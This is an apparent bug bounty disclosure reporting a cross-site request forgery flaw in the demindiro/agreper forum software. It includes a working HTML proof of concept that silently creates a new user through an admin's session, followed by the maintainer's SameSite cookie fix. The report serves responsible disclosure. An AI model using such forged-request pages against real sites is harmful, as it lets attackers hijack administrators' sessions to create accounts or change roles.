Anti-CSRF mechanism is not present in demindiro/agreper

Valid

Reported on

Jan 24th 2023

Description

The application is vulnerable to a CSRF attack.

Proof of Concept

Login as admin.
Open the following HTML file in the browser. This action is equivalent to clicking a link sent by an attacker.

trap.html

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/admin/user/new/" method="POST">
      <input type="hidden" name="name" value="csrf" />
      <input type="hidden" name="password" value="password" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Click the button.
A new user is created.

Impact

This vulnerability is capable of allowing an attacker to force a victim to perform admin actions such as:

Creating a new user
Changing user's role

References

CSRF Protection

We are processing your report and will contact the demindiro/agreper team within 24 hours. 10 months ago

A GitHub Issue asking the maintainers to create a SECURITY.md exists 10 months ago

We have contacted a member of the demindiro/agreper team and are waiting to hear back 10 months ago

David Hoppenbrouwers validated this vulnerability 10 months ago

Apparently Flask doesn't set SameSite by default. Adding app.config['SESSION_COOKIE_SAMESITE'] = 'Lax' resolves this issue.

Thanks!

bAu has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

David Hoppenbrouwers marked this as fixed in 0.1.1b with commit 09f56b 10 months ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

David Hoppenbrouwers published this vulnerability 10 months ago

to join this conversation